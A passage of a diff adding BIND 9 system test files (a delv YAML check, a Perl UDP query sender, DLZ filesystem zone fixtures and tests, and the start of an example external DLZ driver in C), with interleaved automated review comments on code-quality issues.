then echo_i "failed"; fi + status=$((status+ret)) + + if [ $HAS_PYYAML -ne 0 ] ; then + n=$((n+1)) + echo_i "check delv +yaml output ($n)" + ret=0 + delv_with_opts +yaml @10.53.0.3 any ns2.example > delv.out.test$n || ret=1 + value=$($PYTHON yamlget.py delv.out.test$n status || ret=1) + [ "$value" = "success" ] || ret=1 + value=$($PYTHON yamlget.py delv.out.test$n query_name || ret=1) + [ "$value" = "ns2.example" ] || ret=1 + value=$($PYTHON yamlget.py delv.out.test$n records 0 answer_not_validated 0 || ret=1) + count=$(echo $value | wc -w ) + [ ${count:-0} -eq 5 ] || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + fi +else + echo_i "$DELV is needed, so skipping these delv tests" +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/digdelv/yamlget.py b/bin/tests/system/digdelv/yamlget.py new file mode 100644 index 0000000..afa582d --- /dev/null +++ b/bin/tests/system/digdelv/yamlget.py 
@@ -0,0 +1,35 @@
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+import sys
+
+try:
+ import yaml
+# pylint: disable=bare-except
+except:
+ print("No python yaml module, skipping")
+ sys.exit(1)
+
+with open(sys.argv[1], "r", encoding="utf-8") as f:
+ for item in yaml.safe_load_all(f):
+ for key in sys.argv[2:]:
+ try:
+ key = int(key)
+ except ValueError:
+ pass
+
+ try:
+ item = item[key]
+ except KeyError:
+ print('Key "' + key + '" not found.')
+ sys.exit(1)
+
+ print(item)
diff --git a/bin/tests/system/ditch.pl b/bin/tests/system/ditch.pl
new file mode 100644
index 0000000..e208250
--- /dev/null
+++ b/bin/tests/system/ditch.pl
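Review bot: The key-lookup loop in yamlget.py catches only `KeyError`, so an out-of-range list index (`IndexError`) or indexing into a scalar (`TypeError`) ends in a traceback rather than the "not found" message. When the key was converted by `int(key)`, the message itself fails on `'Key "' + key`, because an int cannot be concatenated to a str. Suggest `except (KeyError, IndexError, TypeError):` together with `print('Key "' + str(key) + '" not found.')`. The bare `except:` around `import yaml` also swallows `KeyboardInterrupt` and `SystemExit`; `except ImportError:` would make the pylint suppression unnecessary. The use of `yaml.safe_load_all` on tool output is the right loader and deserves a one-line comment such as `# safe loader: input is program output, never construct arbitrary objects`.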
@@ -0,0 +1,87 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# This is a tool for sending queries via UDP to specified address and +# port, then exiting without waiting for a response. +# +# Usage: ditch.pl [-s <address>] [-p <port>] [filename] +# +# Input (in filename, if specified, otherwise stdin) is a series of one +# or more DNS names and types to send as queries, e.g.: +# +# www.example.com A +# www.example.org MX +# +# If not specified, address defaults to 127.0.0.1, port to 53. + +require 5.006.001; + +use strict; +use Getopt::Std; +use Net::DNS; +use Net::DNS::Packet; +use IO::File; +use IO::Socket; + +sub usage { + print ("Usage: ditch.pl [-s address] [-p port] [file]\n"); + exit 1; +} + +my %options={}; +getopts("s:p:t:", \%options); + +my $addr = "127.0.0.1"; +$addr = $options{s} if defined $options{s}; + +my $port = 53; +$port = $options{p} if defined $options{p}; + +my $file = "STDIN"; +if (@ARGV >= 1) { + my $filename = shift @ARGV; + open FH, "<$filename" or die "$filename: $!"; + $file = "FH"; +} + +my $input = ""; +while (defined(my $line = <$file>) ) { + chomp $line; + next if ($line =~ m/^ *#/); + my @tokens = split (' ', $line); + + my $packet; + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(); + $err and die $err; + } + + my $q = new Net::DNS::Question($tokens[0], $tokens[1], "IN"); + $packet->header->rd(1); + $packet->push(question => $q); + + my $sock = IO::Socket::INET->new(PeerAddr => $addr, PeerPort => $port, + Proto => "udp",) or die "$!"; + + 
my $bytes = $sock->send($packet->data); + #print ("sent $bytes bytes to $addr:$port:\n"); + #print (" ", unpack("H* ", $packet->data), "\n"); + + $sock->close; +} + +close $file; diff --git a/bin/tests/system/dlz/clean.sh b/bin/tests/system/dlz/clean.sh new file mode 100644 index 0000000..65c836a --- /dev/null +++ b/bin/tests/system/dlz/clean.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns*/named.conf +rm -f dig.out.* +rm -f */named.memstats +rm -f */named.run +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/DNAME=10=example.net.= b/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/DNAME=10=example.net.= new file mode 100644 index 0000000..50d2ad0 --- /dev/null +++ b/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/DNAME=10=example.net.= @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +The contents of this file is not read by the filesystem driver. +This is the file for "DNAME 10 example.net.". diff --git a/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/NS=10=example.com.= b/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/NS=10=example.com.= new file mode 100644 index 0000000..5faa45c --- /dev/null +++ b/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/NS=10=example.com.= 
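Review bot: The input file in ditch.pl is opened with the two-argument form `open FH, "<$filename"`, which lets Perl interpret leading/trailing whitespace and mode characters in the name and uses a global bareword handle. The three-argument form, `open(my $fh, '<', $filename) or die "$filename: $!";` with `$file = $fh` (and `\*STDIN` as the default), treats the name literally. `my %options={};` stores a hash reference as a single key instead of creating an empty hash; `my %options;` is what is meant. The option string `"s:p:t:"` also accepts `-t`, which neither the usage text nor the visible code uses.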
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+The contents of this file is not read by the filesystem driver.
+This is the file for "NS 10 example.com.".
diff --git a/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/SOA=10=ns.example.com.=root.example.com.=None=None=None=None=None= b/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/SOA=10=ns.example.com.=root.example.com.=None=None=None=None=None=
new file mode 100644
index 0000000..ee74e03
--- /dev/null
+++ b/bin/tests/system/dlz/ns1/dns-root/com/broken/dns.d/@/SOA=10=ns.example.com.=root.example.com.=None=None=None=None=None=
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+The contents of this file is not read by the filesystem driver.
+This is the file for "SOA 10 ns.example.com. root.example.com. 2010062900 None None None None" which is a malformed SOA record.
diff --git a/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/DNAME=10=example.net.= b/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/DNAME=10=example.net.=
new file mode 100644
index 0000000..50d2ad0
--- /dev/null
+++ b/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/DNAME=10=example.net.=
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+The contents of this file is not read by the filesystem driver.
+This is the file for "DNAME 10 example.net.".
diff --git a/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/NS=10=example.com.= b/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/NS=10=example.com.=
new file mode 100644
index 0000000..5faa45c
--- /dev/null
+++ b/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/NS=10=example.com.=
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+The contents of this file is not read by the filesystem driver.
+This is the file for "NS 10 example.com.".
diff --git a/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/SOA=10=ns.example.com.=root.example.com.=2010062900=0=0=0=10= b/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/SOA=10=ns.example.com.=root.example.com.=2010062900=0=0=0=10=
new file mode 100644
index 0000000..2f63999
--- /dev/null
+++ b/bin/tests/system/dlz/ns1/dns-root/com/example/dns.d/@/SOA=10=ns.example.com.=root.example.com.=2010062900=0=0=0=10=
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+The contents of this file is not read by the filesystem driver.
+This is the file for "SOA 10 ns.example.com. root.example.com. 2010062900 0 0 0 10".
diff --git a/bin/tests/system/dlz/ns1/dns-root/com/example/xfr.d/10.53.0.1 b/bin/tests/system/dlz/ns1/dns-root/com/example/xfr.d/10.53.0.1
new file mode 100644
index 0000000..8a07d4f
--- /dev/null
+++ b/bin/tests/system/dlz/ns1/dns-root/com/example/xfr.d/10.53.0.1
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+The contents of this file are not read by the filesystem driver.
+The presence of this file allows 10.53.0.1 to transfer this zone.
diff --git a/bin/tests/system/dlz/ns1/named.conf.in b/bin/tests/system/dlz/ns1/named.conf.in
new file mode 100644
index 0000000..478672d
--- /dev/null
+++ b/bin/tests/system/dlz/ns1/named.conf.in
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+dlz fszone {
+ database "filesystem dns-root/ dns.d xfr.d 0 =";
+};
diff --git a/bin/tests/system/dlz/prereq.sh b/bin/tests/system/dlz/prereq.sh
new file mode 100644
index 0000000..4cf83f5
--- /dev/null
+++ b/bin/tests/system/dlz/prereq.sh
@@ -0,0 +1,21 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if ! $FEATURETEST --with-dlz-filesystem; then
+ echo_i "DLZ filesystem driver not supported"
+ exit 255
+fi
+exit 0
diff --git a/bin/tests/system/dlz/setup.sh b/bin/tests/system/dlz/setup.sh
new file mode 100644
index 0000000..1dc06c2
--- /dev/null
+++ b/bin/tests/system/dlz/setup.sh
@@ -0,0 +1,18 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+copy_setports ns1/named.conf.in ns1/named.conf
diff --git a/bin/tests/system/dlz/tests.sh b/bin/tests/system/dlz/tests.sh
new file mode 100644
index 0000000..87b3aa6
--- /dev/null
+++ b/bin/tests/system/dlz/tests.sh
@@ -0,0 +1,77 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd +dnssec -p ${PORT}" + +# Check the example.com. domain + +echo_i "checking DNAME at apex works ($n)" +ret=0 +$DIG $DIGOPTS +norec foo.example.com. \ + @10.53.0.1 a > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "example.com..*DNAME.*example.net." dig.out.ns1.test$n > /dev/null || ret=1 +grep "foo.example.com..*CNAME.*foo.example.net." dig.out.ns1.test$n > /dev/null || ret=1 +grep "flags:[^;]* aa[ ;]" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking DLZ IXFR=2010062899 (less than serial) ($n)" +ret=0 +$DIG $DIGOPTS ixfr=2010062899 example.com @10.53.0.1 +all > dig.out.ns1.test$n +grep "example.com..*IN.IXFR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "example.com..*10.IN.DNAME.example.net." dig.out.ns1.test$n > /dev/null || ret=1 +grep "example.com..*10.IN.NS.example.com." dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking DLZ IXFR=2010062900 (equal serial) ($n)" +ret=0 +$DIG $DIGOPTS ixfr=2010062900 example.com @10.53.0.1 +all > dig.out.ns1.test$n +grep "example.com..*IN.IXFR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "example.com..*10.IN.DNAME.example.net." dig.out.ns1.test$n > /dev/null && ret=1 +grep "example.com..*10.IN.NS.example.com." 
dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking DLZ IXFR=2010062901 (greater than serial) ($n)" +ret=0 +$DIG $DIGOPTS ixfr=2010062901 example.com @10.53.0.1 +all > dig.out.ns1.test$n +grep "example.com..*IN.IXFR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "example.com..*10.IN.DNAME.example.net." dig.out.ns1.test$n > /dev/null && ret=1 +grep "example.com..*10.IN.NS.example.com." dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking DLZ with a malformed SOA record" +ret=0 +$DIG $DIGOPTS broken.com type600 @10.53.0.1 > dig.out.ns1.test$n +grep status: dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/dlzexternal/Makefile.in b/bin/tests/system/dlzexternal/Makefile.in new file mode 100644 index 0000000..cfdda3e --- /dev/null +++ b/bin/tests/system/dlzexternal/Makefile.in 
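Review bot: The three IXFR checks and the malformed-SOA check in dlz/tests.sh run `$DIG $DIGOPTS ... > dig.out.ns1.test$n` without `|| ret=1`, unlike the first check, so a failed dig run is only noticed indirectly through the greps; adding `|| ret=1` keeps the checks uniform. The malformed-SOA check also omits `($n)` from its `echo_i` line, and it passes on any `status:` line whatever the rcode. If that is the intent, a comment such as `# any response is acceptable; the point is that named answers despite the malformed SOA` would record it.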
@@ -0,0 +1,49 @@
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+srcdir = @srcdir@
+VPATH = @srcdir@
+top_srcdir = @top_srcdir@
+
+VERSION=@BIND9_VERSION@
+
+@BIND9_MAKE_INCLUDES@
+
+CINCLUDES = ${DNS_INCLUDES} ${ISC_INCLUDES} \
+ ${OPENSSL_CFLAGS}
+CDEFINES =
+CWARNINGS =
+
+LIBS = @LIBS@
+
+SO_TARGETS = driver.@SO@
+TARGETS = @SO_TARGETS@
+
+SRCS = driver.c
+
+SO_OBJS = driver.@O@
+SO_SRCS = driver.c
+
+OBJS =
+
+@BIND9_MAKE_RULES@
+
+CFLAGS = @CFLAGS@ @SO_CFLAGS@
+SO_LDFLAGS = @LDFLAGS@ @SO_LDFLAGS@
+
+driver.@SO@: ${SO_OBJS}
+ ${LIBTOOL_MODE_LINK} @SO_LD@ ${SO_LDFLAGS} -o $@ driver.@O@
+
+clean distclean::
+ rm -f ${TARGETS}
+
+distclean::
+ rm -f ns1/named.conf
diff --git a/bin/tests/system/dlzexternal/clean.sh b/bin/tests/system/dlzexternal/clean.sh
new file mode 100644
index 0000000..2bbf75b
--- /dev/null
+++ b/bin/tests/system/dlzexternal/clean.sh
@@ -0,0 +1,26 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+#
+# Clean up after dlzexternal tests.
+#
+
+rm -f ns1/update.txt
+rm -f */named.memstats
+rm -f */named.conf
+rm -f */named.run
+rm -f ns1/ddns.key
+rm -f dig.out*
+rm -f ns*/named.lock
+rm -f ns1/session.key
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/dlzexternal/driver.c b/bin/tests/system/dlzexternal/driver.c
new file mode 100644
index 0000000..14f02bc
--- /dev/null
+++ b/bin/tests/system/dlzexternal/driver.c
@@ -0,0 +1,845 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * This provides a very simple example of an external loadable DLZ + * driver, with update support. + */ + +#include "driver.h" +#include <inttypes.h> +#include <stdarg.h> +#include <stdbool.h> +#include <stdio.h> +#include <stdlib.h> + +#include <isc/log.h> +#include <isc/result.h> +#include <isc/string.h> +#include <isc/types.h> +#include <isc/util.h> + +#include <dns/dlz_dlopen.h> +#include <dns/types.h> + +#define CHECK(x) \ + do { \ + result = (x); \ + if (result != ISC_R_SUCCESS) \ + goto failure; \ + } while (0) + +#define loginfo(...) \ + ({ \ + if ((state != NULL) && (state->log != NULL)) \ + state->log(ISC_LOG_INFO, __VA_ARGS__); \ + }) +#define logerr(...) 
\ + ({ \ + if ((state != NULL) && (state->log != NULL)) \ + state->log(ISC_LOG_ERROR, __VA_ARGS__); \ + }) + +/* For this simple example, use fixed sized strings */ +struct record { + char name[100]; + char type[10]; + char data[200]; + dns_ttl_t ttl; +}; + +#define MAX_RECORDS 100 + +typedef void +log_t(int level, const char *fmt, ...); + +struct dlz_example_data { + char *zone_name; + + /* An example driver doesn't need good memory management :-) */ + struct record current[MAX_RECORDS]; + struct record adds[MAX_RECORDS]; + struct record deletes[MAX_RECORDS]; + + bool transaction_started; + + /* Helper functions from the dlz_dlopen driver */ + log_t *log; + dns_sdlz_putrr_t *putrr; + dns_sdlz_putnamedrr_t *putnamedrr; + dns_dlz_writeablezone_t *writeable_zone; +}; + +static bool +single_valued(const char *type) { + const char *single[] = { "soa", "cname", NULL }; + int i; + + for (i = 0; single[i]; i++) { + if (strcasecmp(single[i], type) == 0) { + return (true); + } + } + return (false); +} + +/* + * Add a record to a list + */ +static isc_result_t +add_name(struct dlz_example_data *state, struct record *list, const char *name, + const char *type, dns_ttl_t ttl, const char *data) { + int i; + bool single = single_valued(type); + int first_empty = -1; + + for (i = 0; i < MAX_RECORDS; i++) { + INSIST(list[i].name != NULL); + if (first_empty == -1 && strlen(list[i].name) == 0U) { + first_empty = i; + } + if (strcasecmp(list[i].name, name) != 0) { + continue; + } + if (strcasecmp(list[i].type, type) != 0) { + continue; + } + if (!single && strcasecmp(list[i].data, data) != 0) { + continue; + } + break; + } + if (i == MAX_RECORDS && first_empty != -1) { + i = first_empty; + } + if (i == MAX_RECORDS) { + logerr("dlz_example: out of record space"); + return (ISC_R_FAILURE); + } + + if (strlen(name) >= sizeof(list[i].name) || + strlen(type) >= sizeof(list[i].type) || + strlen(data) >= sizeof(list[i].data)) + { + return (ISC_R_NOSPACE); + } + + strncpy(list[i].name, name, 
sizeof(list[i].name) - 1); + list[i].name[sizeof(list[i].name) - 1] = '\0'; + + strncpy(list[i].type, type, sizeof(list[i].type) - 1); + list[i].type[sizeof(list[i].type) - 1] = '\0'; + + strncpy(list[i].data, data, sizeof(list[i].data) - 1); + list[i].data[sizeof(list[i].data) - 1] = '\0'; + + list[i].ttl = ttl; + + return (ISC_R_SUCCESS); +} + +/* + * Delete a record from a list + */ +static isc_result_t +del_name(struct dlz_example_data *state, struct record *list, const char *name, + const char *type, dns_ttl_t ttl, const char *data) { + int i; + + UNUSED(state); + + for (i = 0; i < MAX_RECORDS; i++) { + if (strcasecmp(name, list[i].name) == 0 && + strcasecmp(type, list[i].type) == 0 && + strcasecmp(data, list[i].data) == 0 && ttl == list[i].ttl) + { + break; + } + } + if (i == MAX_RECORDS) { + return (ISC_R_NOTFOUND); + } + memset(&list[i], 0, sizeof(struct record)); + return (ISC_R_SUCCESS); +} + +static isc_result_t +fmt_address(isc_sockaddr_t *addr, char *buffer, size_t size) { + char addr_buf[INET6_ADDRSTRLEN]; + const char *ret; + uint16_t port = 0; + + switch (addr->type.sa.sa_family) { + case AF_INET: + port = ntohs(addr->type.sin.sin_port); + ret = inet_ntop(AF_INET, &addr->type.sin.sin_addr, addr_buf, + sizeof(addr_buf)); + break; + case AF_INET6: + port = ntohs(addr->type.sin6.sin6_port); + ret = inet_ntop(AF_INET6, &addr->type.sin6.sin6_addr, addr_buf, + sizeof(addr_buf)); + break; + default: + return (ISC_R_FAILURE); + } + + if (ret == NULL) { + return (ISC_R_FAILURE); + } + + snprintf(buffer, size, "%s#%u", addr_buf, port); + return (ISC_R_SUCCESS); +} + +/* + * Return the version of the API + */ +int +dlz_version(unsigned int *flags) { + UNUSED(flags); + return (DLZ_DLOPEN_VERSION); +} + +/* + * Remember a helper function from the bind9 dlz_dlopen driver + */ +static void +b9_add_helper(struct dlz_example_data *state, const char *helper_name, + void *ptr) { + if (strcmp(helper_name, "log") == 0) { + state->log = (log_t *)ptr; + } + if 
(strcmp(helper_name, "putrr") == 0) { + state->putrr = (dns_sdlz_putrr_t *)ptr; + } + if (strcmp(helper_name, "putnamedrr") == 0) { + state->putnamedrr = (dns_sdlz_putnamedrr_t *)ptr; + } + if (strcmp(helper_name, "writeable_zone") == 0) { + state->writeable_zone = (dns_dlz_writeablezone_t *)ptr; + } +} + +/* + * Called to initialize the driver + */ +isc_result_t +dlz_create(const char *dlzname, unsigned int argc, char *argv[], void **dbdata, + ...) { + struct dlz_example_data *state; + const char *helper_name; + va_list ap; + char soa_data[sizeof("@ hostmaster.root 123 900 600 86400 3600")]; + isc_result_t result; + size_t n; + + UNUSED(dlzname); + + state = calloc(1, sizeof(struct dlz_example_data)); + if (state == NULL) { + return (ISC_R_NOMEMORY); + } + + /* Fill in the helper functions */ + va_start(ap, dbdata); + while ((helper_name = va_arg(ap, const char *)) != NULL) { + b9_add_helper(state, helper_name, va_arg(ap, void *)); + } + va_end(ap); + + if (argc < 2 || argv[1][0] == '\0') { + logerr("dlz_example: please specify a zone name"); + dlz_destroy(state); + return (ISC_R_FAILURE); + } + + /* Ensure zone name is absolute */ + state->zone_name = malloc(strlen(argv[1]) + 2); + if (state->zone_name == NULL) { + free(state); + return (ISC_R_NOMEMORY); + } + if (argv[1][strlen(argv[1]) - 1] == '.') { + strcpy(state->zone_name, argv[1]); + } else { + sprintf(state->zone_name, "%s.", argv[1]); + } + + /* + * Use relative names to trigger ISC_R_NOSPACE in dns_sdlz_putrr. 
+ */ + if (strcmp(state->zone_name, ".") == 0) { + n = strlcpy(soa_data, + "@ hostmaster.root 123 900 600 86400 3600", + sizeof(soa_data)); + } else { + n = strlcpy(soa_data, "@ hostmaster 123 900 600 86400 3600", + sizeof(soa_data)); + } + + if (n >= sizeof(soa_data)) { + CHECK(ISC_R_NOSPACE); + } + + add_name(state, &state->current[0], state->zone_name, "soa", 3600, + soa_data); + add_name(state, &state->current[0], state->zone_name, "ns", 3600, + state->zone_name); + add_name(state, &state->current[0], state->zone_name, "a", 1800, + "10.53.0.1"); + + loginfo("dlz_example: started for zone %s", state->zone_name); + + *dbdata = state; + return (ISC_R_SUCCESS); + +failure: + free(state); + return (result); +} + +/* + * Shut down the backend + */ +void +dlz_destroy(void *dbdata) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + + loginfo("dlz_example: shutting down zone %s", state->zone_name); + free(state->zone_name); + free(state); +} + +/* + * See if we handle a given zone + */ +isc_result_t +dlz_findzonedb(void *dbdata, const char *name, dns_clientinfomethods_t *methods, + dns_clientinfo_t *clientinfo) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + isc_sockaddr_t *src; + char addrbuf[100]; + char absolute[1024]; + + strcpy(addrbuf, "unknown"); + if (methods != NULL && methods->sourceip != NULL && + methods->version - methods->age <= DNS_CLIENTINFOMETHODS_VERSION && + DNS_CLIENTINFOMETHODS_VERSION <= methods->version) + { + methods->sourceip(clientinfo, &src); + fmt_address(src, addrbuf, sizeof(addrbuf)); + } + + loginfo("dlz_example: dlz_findzonedb called with name '%s' " + "in zone DB '%s' from %s", + name, state->zone_name, addrbuf); + + /* + * Returning ISC_R_NOTFOUND will cause the query logic to + * check the database for parent names, looking for zone cuts. + * + * Returning ISC_R_NOMORE prevents the query logic from doing + * this; it will move onto the next database after a single query. 
+ */ + if (strcasecmp(name, "test.example.com") == 0) { + return (ISC_R_NOMORE); + } + + /* + * For example.net, only return ISC_R_NOMORE when queried + * from 10.53.0.1. + */ + if (strcasecmp(name, "test.example.net") == 0 && + strncmp(addrbuf, "10.53.0.1", 9) == 0) + { + return (ISC_R_NOMORE); + } + + /* + * For bigcname.domain, return success so it appears to be + * the zone origin; this regression tests a bug in which + * zone origin nodes could fail to return SERVFAIL to the client. + */ + if (strcasecmp(name, "bigcname.domain") == 0) { + return (ISC_R_SUCCESS); + } + + /* + * Return success if we have an exact match between the + * zone name and the qname + */ + if (strcasecmp(state->zone_name, name) == 0) { + return (ISC_R_SUCCESS); + } + + snprintf(absolute, sizeof(absolute), "%s.", name); + if (strcasecmp(state->zone_name, absolute) == 0) { + return (ISC_R_SUCCESS); + } + + return (ISC_R_NOTFOUND); +} + +/* + * Look up one record in the sample database. + * + * If the queryname is "source-addr", send back a TXT record containing + * the address of the client, to test the use of 'methods' and 'clientinfo' + * + * If the queryname is "too-long", send back a TXT record that's too long + * to process; this should result in a SERVFAIL when queried. 
+ */ +isc_result_t +dlz_lookup(const char *zone, const char *name, void *dbdata, + dns_sdlzlookup_t *lookup, dns_clientinfomethods_t *methods, + dns_clientinfo_t *clientinfo) { + isc_result_t result; + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + bool found = false; + void *dbversion = NULL; + isc_sockaddr_t *src; + char full_name[256]; + char buf[512]; + static char last[256]; + static int count = 0; + int i, size; + + UNUSED(zone); + + if (state->putrr == NULL) { + return (ISC_R_NOTIMPLEMENTED); + } + + if (strcmp(name, "@") == 0) { + size = snprintf(full_name, sizeof(full_name), "%s", + state->zone_name); + } else if (strcmp(state->zone_name, ".") == 0) { + size = snprintf(full_name, sizeof(full_name), "%s.", name); + } else { + size = snprintf(full_name, sizeof(full_name), "%s.%s", name, + state->zone_name); + } + + if (size < 0 || (size_t)size >= sizeof(full_name) || + (size_t)size >= sizeof(last)) + { + return (ISC_R_NOSPACE); + } + + /* + * For test purposes, log all calls to dlz_lookup() + */ + if (strcasecmp(full_name, last) == 0) { + count++; + } else { + count = 1; + memcpy(last, full_name, size + 1); + } + loginfo("lookup #%d for %s", count, full_name); + + /* + * If we need to know the database version 